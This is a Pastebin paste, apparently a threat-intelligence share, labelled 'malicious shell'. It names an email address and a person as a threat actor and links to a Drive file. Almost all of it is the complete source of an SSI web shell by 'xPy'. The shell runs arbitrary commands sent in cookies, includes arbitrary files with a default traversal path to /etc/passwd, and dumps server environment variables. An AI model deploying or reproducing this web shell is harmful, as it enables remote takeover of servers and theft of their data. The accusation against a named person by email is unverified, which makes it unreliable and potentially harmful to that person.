API tools faq
paste
Advertisement
TrashScrape

thanglove05@gmail.com ( malicious shell )

TrashScrape
Nov 20th, 2019
470
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.08 KB | None | 0 0
raw download clone embed print report
  1. malicious threat actor: thanglove05@gmail.com "Kym Ljnk"
  2.  
  3. /docs.google.com/file/d/0Bws9O4FTzcmSc1F5MkxWODVJdGc/edit
  4.  
  5. <!--#config errmsg="[Error in shell]"-->
  6. <!--#config sizefmt="bytes"-->
  7.  
  8. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"GET\")" -->
  9. <!--#set var="shl" value="ls -al" -->
  10. <!--#else -->
  11. <!--#set var="shl" value=$HTTP_COOKIE -->
  12. <!--#endif -->
  13.  
  14. <!--#if expr="(\"$HTTP_COOKIE\" = \"\") || (\"$REQUEST_METHOD\" != \"POST\")" -->
  15. <!--#set var="inc" value="/../../../../../../../etc/passwd" -->
  16. <!--#else -->
  17. <!--#set var="inc" value=$HTTP_COOKIE -->
  18. <!--#endif -->
  19.  
  20. <html>
  21. <head>
  22. <title>
  23. SSI Web Shell edit by xPy
  24. </title>
  25. <script language="javascript">
  26. function doit( mode ) {
  27. if( document.cookie != "" ) {
  28. var cookies = document.cookie.split( ";" );
  29. for( var i = 0; i < cookies.length; ++i )
  30. document.cookie = cookies[ i ] + ";expires=Thu, 01 Jan 1970 00:00:00 GMT";
  31. }
  32. document.cookie = document.getElementById( mode ).value;
  33. document.location.reload();
  34. }
  35. function toggle( id ) {
  36. document.getElementById( id ).style.display = (document.getElementById( id ).style.display == "none") ? "block" : "none";
  37. }
  38. </script>
  39. </head>
  40. <body bgcolor=#e4e0d8 alink=blue vlink=blue>
  41. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
  42. <center><b><font size=+2><a href=http://wWw.xPy.VN>SSI Web Shell</a></font></b></center>
  43. </div><br>
  44. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  45. <center><b><u><font size=+1 onclick=toggle('inf'); style=cursor:hand;>Common info</font></u></b></center>
  46. <div id=inf style=display:none;><br>
  47. <b><font color=blue>FILE NAME</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_NAME --></b><br>
  48. <b><font color=blue>FILE URL</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=DOCUMENT_URI --></b><br>
  49. <b><font color=blue>Owner</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=USER_NAME --></b><br>
  50. <br></div>
  51. </div>
  52. <br>
  53. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  54. <center><b><u><font size=+1 onclick=toggle('env'); style=cursor:hand;>Enviroment info</font></u></b></center>
  55. <div id=env style=display:none;><br>
  56. <pre>
  57. <!--#printenv-->
  58. </pre>
  59. <br></div>
  60. </div>
  61. <br>
  62. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  63. <center><b><u><font size=+1 onclick=toggle('shl'); style=cursor:hand;>Command for shell</font></u></b></center></div>
  64. <div align=left width=100% border=0 id=shl style=background-color:#D4D0C8;<!--#if expr="\"$REQUEST_METHOD\" != \"GET\"" -->display:none;<!--#endif -->>
  65. <br><b><font color=blue>Enter command</font></b>:&nbsp;&nbsp;&nbsp;<form method=get onsubmit=doit('command');><input type=text size=80 id=command>&nbsp;<input type=submit value=Run></form><br>
  66. <center><b><font size=+1>Result</font></b></center>
  67. <br>
  68. <b><font color=blue>Executed command</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=shl --></b><br>
  69. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
  70. <!--#exec cmd=$shl -->
  71. </textarea>
  72. </div>
  73. <div align=left width=100% border=0 style=background-color:#D4D0C8;>
  74. <center><b><u><font size=+1 onclick=toggle('inc'); style=cursor:hand;>Operations on files</font></u></b></center>
  75. <div id=inc <!--#if expr="\"$REQUEST_METHOD\" != \"POST\"" -->style=display:none;<!--#endif -->><br>
  76. <b><font color=blue>View file (virtual include)</font></b>:&nbsp;&nbsp;&nbsp;<form method=post onsubmit=doit('vfile');><input type=text size=80 id=vfile>&nbsp;<input type=submit value=Run></form><br>
  77. <b><font color=blue>Included file</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#echo var=inc --></b><br>
  78. <b><font color=blue>Size</font></b>:&nbsp;&nbsp;&nbsp;<b><!--#fsize virtual=$inc -->&nbsp;bytes</b><br>
  79. <textarea bgcolor=#e4e0d8 cols=121 rows=15>
  80. <!--#include virtual=$inc -->
  81. </textarea>
  82. <br></div>
  83. </div>
  84. <br>
  85. <div align=center width=100% border=0 style=background-color:#D4D0C8;>
  86. <center><b><font size=+1><a href=http://wWw.xPy.VN>(c) xPy</a></font></b><br><small>2012, v1.0</small></center>
  87. </div>
  88. </body>
  89. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!